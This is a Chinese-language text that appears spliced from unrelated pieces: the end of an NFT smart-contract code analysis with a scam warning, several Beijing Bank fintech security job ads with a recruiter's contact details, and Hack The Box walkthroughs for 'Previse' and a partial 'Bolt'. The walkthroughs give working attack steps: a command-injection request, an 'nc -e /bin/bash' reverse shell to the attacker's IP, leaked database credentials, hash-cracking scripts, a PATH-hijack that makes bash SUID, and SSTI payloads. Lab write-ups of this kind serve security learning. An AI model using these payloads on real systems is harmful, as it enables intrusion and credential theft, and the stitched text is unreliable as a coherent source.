for (uint256 ii = 0; ii < info.images.length; ++ii) {    uint256 tokenId = info.images[ii];
    if (ownerOf(tokenId) == info.user) {        images[numImages++] = tokenId;    }}for (uint256 ii = 0; ii < info.videos.length; ++ii) {      uint256 tokenId = info.videos[ii];
      if (ownerOf(tokenId) == info.user && !chill__videoUsed[tokenId]) {          videos[numVideos++] = tokenId;      }  }

上述代码是为了将参与合成的数字藏品 tokenId 记录到 uint256[] memory images 及 uint256[] memory videos 中，其中普通款参与合成的藏品 tokenId 记录到 images ，隐藏款参与合成的 tokenId 记录到 videos中。

if (ownerOf(tokenId) == info.user) {        images[numImages++] = tokenId;    }if (ownerOf(tokenId) == info.user && !chill__videoUsed[tokenId]) {          videos[numVideos++] = tokenId;     }

上述代码中很关键的逻辑其实在于 if 语句中的条件，ownerOf(tokenId) == info.user ，其中info 是调用者传入的参数 info.user 对应的内容即为账户（0x18b1edd5ae7...），ownerOf能够判定 tokenId 对应数字资产的所属账户，说明合约开发者希望避免自己调用时通过 info 指定的参数出现错误，必须要求确实持有该数字资产的用户才能够参与合成。numImages++，能够记录账户参与合成的普通款藏品数量，有的账户可能有30个普通藏品，加4个隐藏藏品，则能够合成两次，获得两个合成藏品。有的账户可能有更多，不信，可以参考如下交易：

https://www.confluxscan.net/transaction/0xfdb70f2122896f402b4e97231b6c3983fc43606b1c049acd1760265df2225b5d

!chill__videoUsed[tokenId] 这一检测逻辑其实更为简单，它维护了一个全局状态，解决了如下需求：在不销毁隐藏款数字藏品的前提下，知晓该数字藏品是否已参与过合成操作。如果没参与过合成，才能够参与合成操作。假设 tokenId == 1 的藏品参与过合成操作，则chill__videoUsed[1] 将被设置为 true。 

uint256 imageId = 0;uint256 videoId = 0;
while ((numImages - imageId) >= numImagesForReward && (numVideos - videoId) >= numVideosForReward) {    // burn images    for (uint256 ii = 0; ii < numImagesForReward; ++ii) {        uint256 tokenId = images[imageId++];        _burn(tokenId);    }
    // skip videos    for (uint256 ii = 0; ii < numVideosForReward; ++ii) {        uint256 tokenId = videos[videoId++];        chill__videoUsed[tokenId] = true;    }
    // send out reward    emit ChillExchange(info.user, chill__nextRewardId);    this.transferFrom(address(this), info.user, chill__nextRewardId++);
}

 上述代码是合成所实现的逻辑是一个 while 循环中嵌套了 for 循环， while 循环条件如下：

(numImages - imageId) >= numImagesForReward &&

 (numVideos - videoId) >= numVideosForReward， imageId 及 videoId初始值设置为0，并随着合成的进行，配合 for 循环进行自增（++ 操作），numImages 及 numVideos 分别是账户中持有普通款藏品的数目和隐藏款藏品的数目。 numImagesForReward 固定为 15，numVideosForReward 固定为 2。所以这段逻辑不言自明：只要用户持有的藏品数还足够合成，就继续合成下去，直到用户账户中的藏品不够参与合成了。

numImages 及 numVideos 变量在前序逻辑中已进行了介绍，他们主要解决的问题就是记录用户到底有多少可以合成的资产，比如有个用户可能持有了45个普通款数字藏品和6个隐藏款数字藏品。则这个 while 循环可以帮助他合成3次。

for (uint256 ii = 0; ii < numImagesForReward; ++ii) {        uint256 tokenId = images[imageId++];        _burn(tokenId);    }for (uint256 ii = 0; ii < numVideosForReward; ++ii) {        uint256 tokenId = videos[videoId++];        chill__videoUsed[tokenId] = true;    }

上述代码的逻辑就比较简单了， numImagesForReward 固定为15 ，numVideosForReward 固定为 2 。for 循环在此处的作用相当于 while 循环的子循环，通过维护临时变量 imageId 及 videoId 判定是否还能继续合成。对于普通款藏品（第3行），会调用 _burn 函数进行销毁（转移至0地址），对于隐藏款藏品（第7行），将标志位 chill__videoUsed[tokenId] 设置为 true（这样该隐藏藏品就不能再参与其他合成操作了）。

emit ChillExchange(info.user, chill__nextRewardId);this.transferFrom(address(this), info.user, chill__nextRewardId++);

最后的逻辑主要就是两行代码，通过 emit 操作通知区块链，info.user 对应的用户已经合成完成，合成藏品的编号 ID 为 chill__nextRewardId，并调用 transferFrom 方法将chill__nextRewardId 对应的藏品转发至 info.user 对应的账户中。由于++是先使用当前值，再自增，所以能够确保下一次合成所生成的数字藏品编号是正确且不重复的。

五、安全威胁识别：

本章内容仅结合合约代码逻辑进行安全性问题识别与探讨，并不代表实际对应合约存在问题，经研究分析我们提炼了该合约潜在存在的安全问题：

（1）minter 的权限滥用

（2）具备合成条件，但不想参与合成的用户，同样会被代码自动合成；

（3）如果普通用户具备调用合约的条件，则可以通过构造函数的方法，将 numImagesForReward 及 numVideosForReward 设置为更低的值，使本身不符合15个普通藏品及2个隐藏藏品的用户，同样能够合成数字藏品。

（4）代理合约所带来的替换风险。

六、威胁情报共享

近期有 KOL 发现在 OpenSea 上存在空投数字藏品配合 offer 的攻击，如果点击接受 offer 则账户持有的资产将被自动转移。

藏品地址：

https://opensea.io/assets/ethereum/0x5e8ff95473d1eb96e2099cce5f6f171aac115947/58

提供 offer 操作的地址：

0x7747bb451f7a979fa7c9830b3b0a99903a921972

请大家在使用时，注意资产及授权安全。

七、参考资料及鸣谢

（1）奥DIONYSOS 公众号所提供的合成玩法预告：

    https://mp.weixin.qq.com/s/AHn9xEnwtJdKZLnQK19S6g

（2）ConfluxScan 浏览器

    https://www.confluxscan.net/

（3）鸣谢：SeeDao安全学习小组为编写本文所提供的思路与技术指导。

阅读原文

跳转微信打开

北京银行旗下全资子公司北银金融科技公司具有国企背景，公司高层全部由北京银行派出的领导组成。北银金融科技公司员工同时享受市场化工资待遇、全额五险一金和北京银行员工的免费食堂三餐、培训机会、正式固定办公工位及更衣柜、洗衣券、节日礼品等福利。

公司简介

北京银行旗下全资子公司北银金融科技公司具有国企背景，公司高层全部由北京银行派出的领导组成。北银金融科技公司员工同时享受市场化工资待遇、全额五险一金和北京银行员工的免费食堂三餐、培训机会、正式固定办公工位及更衣柜、洗衣券、节日礼品等福利。

试用期间薪资100%发放，有满额五险一金，任职满一年增加补充医疗、任职满两年增加企业年金（上述政策以人力最终offer通知为准）

信息安全管理岗（内控方向）-北银顺义数据中心

岗位职责：

1. 负责全行信息安全体系规划，风险防范和制度规范建设，健全管理体系制度要求，跟进组织安全应急响应流程、安全基线的编写与归档；

2. 负责国家安全相关政策标准解读，并与行内系统对标，提出安全合规建议；

3. 负责协调内外审计，审查行内安全相关流程是否合规，监督、审查岗位安全要求落实情况，归口对接支持工作；

4. 负责健全安全绩效考核体系和考核标准；

5. 负责研究信息安全等级保护相关政策要求并推进落地。

岗位要求：

1. 具有较强的语言表达能力，工作认真细致。

2. 统招本科及以上学历，信息安全、电子信息、计算机等相关专业，至少需2年工作经验。

3. 工作态度积极主动，对于不熟悉的领域勇于学习探索。

4. 具备CISSP\CISP\CISM\CCIE\CISA\27001审核员等相关证书优先。

5. 具有甲方安全团队及金融行业从业经验，项目经验领域广泛者优先。

6. 对岗位有深入理解，做好经验积累和传导，对分行提供信息安全方面支持。

待遇：30K-60K 能力强上不封顶

工作地点：顺义

邮箱投递：renjunfeng@bobfintech.com.cn

微信投递：13241087707

信息安全管理岗（服务方向）-北银顺义数据中心

岗位职责：

1. 负责安全技术研究，探索前沿信息安全技术架构，对行内部门提供安全支撑，推进项目进展，不断提升北京银行安全体系架构防护能力；

2. 负责安全攻防项目管理，组织对行内系统进行安全评估，并持续跟进安全漏洞整改；负责组建攻防团队，并参与攻防演练竞赛；需具有独立的app\web漏洞挖掘、攻防演练、内网渗透等能力，曾上过大型公司SRC排行榜优先；

3. 负责主机安全管理，组织开展主机防病毒、入侵检测等项目实施工作，并具有主机应急响应经验，能够根据主机日志对安全事件进行溯源分析，负责相关产品的部署、实施、日常运维；

4. 负责行内系统的安全架构评估，对项目生命周期进行安全把控，对接其他部室和分支机构，提供安全解决方案和安全服务。

备注：2、3至少具有其中一项能力即可。

岗位要求：

1. 具有较强的语言表达能力，工作认真细致。

2. 统招本科及以上学历，信息安全、电子信息、计算机等相关专业，至少需2年工作经验。

3. 工作态度积极主动，对于不熟悉的领域勇于学习探索。

4. 具备CISSP\CISP\CISM\CCIE\CISA\27001审核员等相关证书优先。

5. 具有甲方安全团队及金融行业从业经验，项目经验领域广泛者优先。

6. 对岗位有深入理解，做好经验积累和传导，对分行提供信息安全方面支持。

待遇：30K-60K 能力强上不封顶

工作地点：顺义

邮箱投递：renjunfeng@bobfintech.com.cn

微信投递：13241087707

信息安全管理岗（监控方向）-北银顺义数据中心

岗位职责：

1. 负责全行信息安全实时监控体系的规划、部署、运维及策略优化工作，实现全行信息安全态势实时监控，并负责安全事件应急响应，本岗位要求需具备HW相关经验；

2. 负责制定我行安全数据采集标准规范，统一分析安全告警、日志；

3. 及时掌握安全事件舆情信息动态，并及时完善策略，提升平台威胁发现能力；

4. 研究、建立信息安全威胁处置和自动化运维联动机制；

5. 负责安全设备的规划、部署和日常运维，包含WAF、IPS、IDS、蜜罐、态势感知、堡垒机等。

岗位要求：

1. 具有较强的语言表达能力，工作认真细致。

2. 统招本科及以上学历，信息安全、电子信息、计算机等相关专业，至少需2年工作经验。

3. 工作态度积极主动，对于不熟悉的领域勇于学习探索。

4. 具备CISSP\CISP\CISM\CCIE\CISA\27001审核员等相关证书优先。

5. 具有甲方安全团队及金融行业从业经验，项目经验领域广泛者优先。

6. 对岗位有深入理解，做好经验积累和传导，对分行提供信息安全方面支持。

待遇：30K-60K 能力强上不封顶

工作地点：顺义

邮箱投递：renjunfeng@bobfintech.com.cn

微信投递：13241087707

信息安全管理岗（防御方向）-北银顺义数据中心

岗位职责：

1. 负责数据中心安全防御体系建设与维护，安全域规划设置，结合行业信息安全发展动向对我行生产网及办公网访问控制规则提出安全防范与控制建议；

2. 负责防火墙、VPN网络运维管理，对接访问控制相关需求评审和执行，设备规划、部署和日常运维。需精通主流防火墙工作原理、配置方法与故障处置，如华为、飞塔、山石、思科等，以及对国产品牌有一定了解如天融信、迪普等；

3. 规划、设计和部署全行桌面病毒防护系统，归类总结病毒危害事件，制定最佳实践和应急流程；规划终端数据安全管理机制，如准入、终端水印、DLP、无线网等，具有零信任实践经验优先；

4. 负责网络安全攻击事件的应急响应处置工作，如阻断IP等，并进行分析和总结，进行策略优化。

备注：2、3具有其中一项能力即可。

岗位要求：

1. 具有较强的语言表达能力，工作认真细致。

2. 统招本科及以上学历，信息安全、电子信息、计算机等相关专业，至少需2年工作经验。

3. 工作态度积极主动，对于不熟悉的领域勇于学习探索。

4. 具备CISSP\CISP\CISM\CCIE\CISA\27001审核员等相关证书优先。

5. 具有甲方安全团队及金融行业从业经验，项目经验领域广泛者优先。

6. 对岗位有深入理解，做好经验积累和传导，对分行提供信息安全方面支持。

待遇：30K-60K 能力强上不封顶

工作地点：顺义

邮箱投递：renjunfeng@bobfintech.com.cn

微信投递：13241087707

信息安全管理岗-内控合规方向-北京银行顺义

职位描述

工作职责（管理岗）：

本岗位在北京银行数据中心顺义马坡工作，根据北京银行领导的要求执行信息安全系统建设和信息安全管理工作，并对软硬件原厂工程师和各乙方驻场工程师进行管理。

岗位职责：

1.负责网络信息安全体系相关安全管理制度，编写安全记录文档并归档；

2.负责审查信息安全流程，制度，是否合规；

3.研究国家等级保护法规和政策，制定等保测评框架，对接协调各部门进行等保测评工作；

4.对北京银行输出信息安全解决方案。

岗位要求：

1.大学统招本科毕业或本科以上，学信网或民信网可查，有学历和学位证书，非专升本。

2.了解各类安全体系模型；

3.了解网络安全、信息安全、等级保护、个人隐私保护相关标准和法律法规；

4.具有良好的沟通交流能力和文档编写能力，细致专注，有较强的责任心和团队合作能力。

待遇：30K-60K 能力强上不封顶

工作地点：顺义

邮箱投递：renjunfeng@bobfintech.com.cn

微信投递：13241087707

信息安全管理岗-安全运营方向-北银顺义数据中心

职位描述

工作职责

1、负责北京银行容器云平台建设和日常运维工作；

2、负责docker和K8S的部署和运维；

3、持续梳理并优化容器云平台的架构和稳定性；

4、助力业务线落地，输出解决方案，解决实际应用中的问题；

5、优化平台资源，不断提高资源的利用率。

任职要求

1.年龄32周岁（含）以下，全日制大学本科及以上学历，计算机、通信等相关专业;

2.具有至少3年以上相关领域工作经验;

3.具备良好的服务意识，善于主动思考，自我驱动力强，有良好的沟通、协调能力，富有团队精神，有一定的抗压能力；

4.精通Kubernets、Docker架构原理，配置调优与故障诊断；

5.精通Linux操作系统管理、配置。

6.熟悉Linux常用开源组件(Nginx、HAProxy、MySql、Redis，ELK等)的安装和配置；

7.具有CKA、CKAD、CKS等相关证书者优先考虑。

待遇：30K-60K 能力强上不封顶

工作地点：顺义

邮箱投递：renjunfeng@bobfintech.com.cn

微信投递：13241087707

扫码进群关注最新招聘信息！

喜欢就请关注我们吧！

信息收集

nmap扫描端口

└─# nmap  --min-rate=1000 -sV -sC 10.10.11.104  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-15 02:44 EDT
Nmap scan report for 10.10.11.104
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.93 seconds
                                                              

发现端口80:打开端口浏览器访问，发现是个php的登录界面。sql尝试不行。admin:admin弱密码登录。还有其他思路在文末

web渗透

访问各个页面是个比较简单的web应用。随便点点发现两个有意思的页面，一个是个用户注册，一个是文件上传。上传试试。

发现有回显，文件名没变？?

发现为下载id为33。做了映射?还是存到了数据库。还有一个zip下载看看。是源码。

解压缩发现数据库密码是

<?php
function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}
?>

尝试代码审计。发现文件上传确实传递到了数据库。没有文件包含。在logs.php有一个使用一个危险函数exec，直接拼接名执行命令。

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

是调用python运行的。可以尝试命令注入。

POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3m9h1c26tve4hcdsnqicrjuim2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

delim=1;whoami

发现无回显。尝试使用反弹shell

nc -e /bin/bash 10.10.14.70 4444

直接到用户目录获取flag。发现权限不够。尝试提权。发现有个本地有个3306

netstat -atn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      1 10.10.11.104:58524      1.1.1.1:53              SYN_SENT   
tcp        0      0 10.10.11.104:59894      10.10.14.70:4444        ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0    491 10.10.11.104:80         10.10.14.52:48704       FIN_WAIT1  

开启交互式shell，发现查看用户密码：

select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password                           | created_at          |
+----+----------+------------------------------------+---------------------+
|  1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
|  2 | admin    | $1$🧂llol$uXqzPW6SXUONt.AIOBqLy. | 2021-10-15 06:17:09 |
|  3 | hogeuser | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-10-15 07:34:26 |
+----+----------+------------------------------------+---------------------+
3 rows in set (0.00 sec)

这个密码把我看蒙了？记得前面有个创建新用户看看代码果然是通过php 函数加密的。。accounts.php下第56行。

$hash = crypt($password, '$1$🧂llol$');

了解一下php 的crypt函数发现是个多功能加密函数。PHP crypt() 函数 | 菜鸟教程 (runoob.com)

类比之下感觉使用了md5加密。解密它。

Standard DES: rl.3StKT.4T8M
Extended DES: _J9..rasmBYk8r9AiWNc
MD5:          $1$rasmusle$rISCgZzpwk3UhDidwXvin0
Blowfish:     $2a$07$usesomesillystringfore2uDLvp1Ii2e./U9C8sBjqp8I90dH6hi
SHA-256:      $5$rounds=5000$usesomesillystri$KqJWpanXZHKq2BOB43TSaYhEWsQ1Lr5QNyPCDH/Tp.6
SHA-512:      $6$rounds=5000$usesomesillystri$D4IrlXatmP7rx3P3InaxBeoomnAihCKRVQP22JZ6EY47Wc6BkroIuUUBOov1i.S5KPgErtP/EN5mcO.ChWQW21

有了加密算法，有了密文。有了密钥：使用php脚本进行解密

<?php
$lines = file("/usr/share/wordlists/rockyou.txt");
foreach ($lines as $line) {
    $line = trim($line);
    if($line!=""){
         $hash = crypt($line, '$1$🧂llol$');
         if ($hash == '$1$🧂llol$uXqzPW6SXUONt.AIOBqLy.') {
                 echo "\n $line\n";
                 echo "\n--------------------爆破结束--------------------\n"; }
    }
}
?>

username = m4lwhere
password = ilovecody112235!

ssh m4lwhere@10.10.11.104
ilovecody112235!

linux提权

登录,尝试提权

m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere: 
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh

常看内容是一个压缩脚本

m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh 
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

查看权限

m4lwhere@previse:~$ ls -al /opt/scripts/access_backup.sh
-rwxr-xr-x 1 root root 486 Jun  6 12:49 /opt/scripts/access_backup.sh

发现是没有写权限的如何使用呢？想起基础知识中的命令替换。

这里的gzip是以root权限执行，最简单的方法是使用反弹shell,可以加一个S权限的后门文件

可以将gzip命令替换为。/bin/bash就可以。

有几种思路：

• 可以反弹shell

• 开启一个创建一个具有s权限的软连接或bash文件

经过测试发现效果一样但是使用软链接创建的文件使用的会将s权限加在/bin/bash文件上

cd /tmp
cat << EOF > gzip
#!/bin/bash
ln -s /bin/bash /tmp/bash
chmod +s bash
EOF
chmod +x gzip
export PATH=$(pwd):$PATH

其他思路

登陆

抓包后点击Do interrcept > Response to this request来进行更改状态码将404返回头修改为HTTP/1.1 200

这个我不知道，回来看到这里代码看了下，确实有，php代码只进行了登陆校验，但是没有使用exit()或者die()函数结束运行。

密码破解

john

┌──(root💀kali)-[~/tmp]
└─# john -format=md5crypt-long -wordlist=/usr/share/wordlists/rockyou.txt 1.txt                             
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovecody112235! (?)
1g 0:00:07:19 DONE (2021-10-15 05:52) 0.002275g/s 16869p/s 16869c/s 16869C/s ilovecokey..ilovecody..
Use the "--show" option to display all of the cracked passwords reliably
Session completed

hastcat

┌──(root💀root)-[~/Desktop]
└─# hashcat -a 0 -m 500 1.txt --wordlist /usr/share/wordlists/rockyou.txt  -o 123                                                                                                                             255 ⨯
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz, 2868/2932 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

┌──(root💀root)-[~/Desktop]
└─# cat 123                                                          
$1$��llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

References

[1] 《Hackthebox - Previse 靶场实战》: https://zhuanlan.zhihu.com/p/392971774

喜欢就请关注我们吧！

【HTB系列】Bolt

0x01 信息收集

─# nmap  10.10.11.114  -p- -sC -sV  --min-rate=2000Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 08:34 ESTNmap scan report for 10.10.11.114Host is up (0.31s latency).Not shown: 65532 closed tcp ports (reset)PORT    STATE SERVICE  VERSION22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)80/tcp  open  http     nginx 1.18.0 (Ubuntu)|_http-title:     Starter Website -  About |_http-server-header: nginx/1.18.0 (Ubuntu)443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)| http-title: Passbolt | Open source password manager for teams|_Requested resource was /auth/login?redirect=%2F| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU| Not valid before: 2021-02-24T19:11:23|_Not valid after:  2022-02-24T19:11:23|_http-server-header: nginx/1.18.0 (Ubuntu)|_ssl-date: TLS randomness does not represent timeService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 70.73 seconds

访问网站又一个登录口，还可以创建账户。走一个。不行。有报错

打开后发现是几个虚拟机镜像，有一些信息泄露

0x02 漏洞挖掘

─# cat repositories                                                         
{"flask-dashboard-adminlte_appseed-app":{"latest":"3350815d3bdf21771408f91da4551ca6f4e82edce74e9352ed75c2e8a5e68162"}}

这里说，最后一个版本是 xxx。进入目录app/base/__pycache__下发现两个pyc文件。反编译后代码如下：

 pip3 install uncompyle6 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 

当作知识点吧。反编译根源码还是差点。下面发现了源码贴了上来

# -*- encoding: utf-8 -*-"""Copyright (c) 2019 - present AppSeed.us"""
from flask import jsonify, render_template, redirect, request, url_forfrom flask_login import (    current_user,    login_required,    login_user,    logout_user)
from app import db, login_managerfrom app.base import blueprintfrom app.base.forms import LoginForm, CreateAccountFormfrom app.base.models import Userfrom hmac import compare_digest as compare_hashimport crypt
@blueprint.route('/')def route_default():    return redirect(url_for('base_blueprint.login'))
## Login & Registration
@blueprint.route('/login', methods=['GET', 'POST'])def login():    login_form = LoginForm(request.form)    if 'login' in request.form:                # read form data        username = request.form['username']        password = request.form['password']
        # Locate user        user = User.query.filter_by(username=username).first()                # Check the password        stored_password = user.password        stored_password = stored_password.decode('utf-8')        if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):
            login_user(user)            return redirect(url_for('base_blueprint.route_default'))
        # Something (user or pass) is not ok        return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)
    if not current_user.is_authenticated:        return render_template( 'accounts/login.html',                                form=login_form)    return redirect(url_for('home_blueprint.index'))
@blueprint.route('/register', methods=['GET', 'POST'])def register():    login_form = LoginForm(request.form)    create_account_form = CreateAccountForm(request.form)    if 'register' in request.form:
        username  = request.form['username']        email     = request.form['email'   ]        data = User.query.filter_by(email=email).first()        if data is None:            # Check usename exists            user = User.query.filter_by(username=username).first()            if user:                return render_template( 'accounts/register.html',                                     msg='Username already registered',                                    success=False,                                    form=create_account_form)
            # Check email exists            user = User.query.filter_by(email=email).first()            if user:                return render_template( 'accounts/register.html',                                     msg='Email already registered',                                     success=False,                                    form=create_account_form)
            # else we can create the user            user = User(**request.form)            db.session.add(user)            db.session.commit()
            return render_template( 'accounts/register.html',                                 msg='User created please <a href="/login">login</a>',                                 success=True,                                form=create_account_form)
    else:        return render_template( 'accounts/register.html', form=create_account_form)
@blueprint.route('/logout')def logout():    logout_user()    return redirect(url_for('base_blueprint.login'))
## Errors
@login_manager.unauthorized_handlerdef unauthorized_handler():    return render_template('page-403.html'), 403
@blueprint.errorhandler(403)def access_forbidden(error):    return render_template('page-403.html'), 403
@blueprint.errorhandler(404)def not_found_error(error):    return render_template('page-404.html'), 404
@blueprint.errorhandler(500)def internal_error(error):    return render_template('page-500.html'), 500

└─# cat forms.py # uncompyle6 version 3.8.0# Python bytecode 3.6 (3379)# Decompiled from: Python 3.9.7 (default, Sep 24 2021, 09:43:00) # [GCC 10.3.0]# Embedded file name: /app/base/forms.py# Compiled at: 2021-03-05 12:48:36# Size of source mod 2**32: 791 bytes"""Copyright (c) 2019 - present AppSeed.us"""from flask_wtf import FlaskFormfrom wtforms import TextField, PasswordFieldfrom wtforms.validators import InputRequired, Email, DataRequired
class LoginForm(FlaskForm):    username = TextField('Username', id='username_login', validators=[DataRequired()])    password = PasswordField('Password', id='pwd_login', validators=[DataRequired()])

class CreateAccountForm(FlaskForm):    username = TextField('Username', id='username_create', validators=[DataRequired()])    email = TextField('Email', id='email_create', validators=[DataRequired(), Email()])    password = PasswordField('Password', id='pwd_create', validators=[DataRequired()])# okay decompiling forms.cpython-36.pyc                                         

东西太多， 先看哪些重要的

for i in a:
    os.system("tar -tvf"+i)

几个特殊的文件列一下：

a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar-rw-r--r-- root/root     16384 2021-03-05 12:44 db.sqlite3
2265c5097f0b290a53b7556fd5d721ffad8a4921bfc2a6e378c04859185d27fa/layer.tar-rw-r--r-- root/root       791 2021-03-05 12:48 app/base/forms.py-rw-r--r-- root/root      3778 2021-03-05 12:49 app/base/routes.py745959c3a65c3899f9e1a5319ee5500f199e0cadf8d487b92e2f297441f8c5cf/layer.tar-rw-r--r-- root/root       142 2021-03-05 06:11 .env-rw-r--r-- root/root      1448 2021-03-05 09:22 config.py-rw-r--r-- root/root       198 2021-03-05 06:11 gunicorn-cfg.py-rw-r--r-- root/root       116 2021-03-05 07:40 requirements.txt-rw-r--r-- root/root       955 2021-03-05 06:11 run.py

在config.py文件中有一个sqllite3连接和postfreSQl数据库的账号密码。

    #PostgreSQL database
    SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
        config( 'DB_ENGINE'   , default='postgresql'    ),
        config( 'DB_USERNAME' , default='appseed'       ),
        config( 'DB_PASS'     , default='pass'          ),
        config( 'DB_HOST'     , default='localhost'     ),
        config( 'DB_PORT'     , default=5432            ),
        config( 'DB_NAME'     , default='appseed-flask' )
    )

admin   admin@bolt.htb  $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.

密码密文。通过接口login可以发现接口是这样加密的

        # read form data        username = request.form['username']        password = request.form['password']
        # Locate user        user = User.query.filter_by(username=username).first()                # Check the password        stored_password = user.password        stored_password = stored_password.decode('utf-8')        if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):
            login_user(user)            return redirect(url_for('base_blueprint.route_default'))

根据代码逻辑，关键在于使用username 查询后创建了一个user对象。用户登录的条件是用户存在，且用户密码和用户原始密码（用密文当盐）的加密相比的，竟然能等于原来的值。一脸懵逼。解密出如下密码：

admin/deadbolt

到这里感觉没东西了

扫描一下vhost,找到两个子域名 demo 和mail。

现在有三个网站了。

demo.bolt.htb#一个登录界面，能够创建用户，需要一个invite code
mail.boot.htb  #一个登录界面
passbolt.bolt.htb AdminLTE3

在config.py中还配置了一个SECRET_KEY default='S#perS3crEt_007'。

尝试一下不行

找了好久找到了

'XNSS-HSJW-3NGU-8XTJ'

curl -i -s -k -X $'POST' \
    -H $'Host: demo.bolt.htb' \
    --data-binary $'\x0d\x0ausername=123&email=123@qq.com&password=123&invite_code=XNSS-HSJW-3NGU-8XTJ' \
    $'http://demo.bolt.htb/register'

注册后发现可以登录mail，mail应该是一个邮件服务器。

邮件服务可以登录,发现修改一下配置，会收到一个邮件？？？因为是pyhon的尝试模版注入。

点击后，发现一个新的邮件,出现了10000,说明name参数处存在SSTI注入漏洞。

{{"".__class__.__bases__[0].__subclasses__()}}

查看到  popen是223个

{{"".__class__.__bases__[0].__subclasses__()[222]}}
<class 'subprocess.Popen'>

最终调用初始化，发现不行。

{{"".__class__.__bases__[0].__subclasses__()[222].__init__}}
